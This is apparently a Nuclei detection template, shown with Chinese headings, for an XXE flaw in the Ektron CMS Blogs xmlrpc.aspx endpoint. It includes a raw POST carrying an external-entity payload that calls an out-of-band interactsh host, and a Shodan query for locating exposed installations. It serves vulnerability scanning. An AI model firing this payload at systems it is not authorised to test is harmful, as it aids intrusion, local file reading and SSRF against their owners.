漏洞描述
Detects XML External Entity (XXE) vulnerability in Ektron CMS Blogs component (/WorkArea/Blogs/xmlrpc.aspx). Allows unauthenticated attackers to read local files or perform SSRF.
ektron-blog-xmlrpc-xxe: Ektron CMS Blogs xmlrpc.aspx - XML External Entity Injection
PoC代码[已公开]
id: ektron-blog-xmlrpc-xxe
info:
name: Ektron CMS Blogs xmlrpc.aspx - XML External Entity Injection
author: pussycat0x
severity: high
description: |
Detects XML External Entity (XXE) vulnerability in Ektron CMS Blogs component (/WorkArea/Blogs/xmlrpc.aspx). Allows unauthenticated attackers to read local files or perform SSRF.
reference:
- https://www.exploit-db.com/exploits/21085
- https://packetstormsecurity.com/files/116259/Ektron-CMS-8.5.0-File-Upload-XXE-Injection.html
- https://www.acunetix.com/vulnerabilities/web/ektron-cms-multiple-vulnerabilities
metadata:
verified: false
max-request: 2
shodan-query: http.html:"EktronClientManager"
tags: xxe,ektron,cms,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "EktronClientManager")'
condition: and
- raw:
- |
POST /WorkArea/Blogs/xmlrpc.aspx HTTP/1.1
Host: {{Hostname}}
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://{{interactsh-url}}">]>
<scan>&test;</scan>
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, "dns")
- status_code == 200 || status_code == 500
condition: and
# digest: 4a0a00473045022100a2a200f7cfae38d7a6b66bcb1c60fd3cdd70df6b7e2cfacb156f03656e5c0bb9022031607e22ece395e0797952017d9f46f3bc36ed2009856b45a2035ee606a6d69d:922c64590222798bb761d5b6d8e72950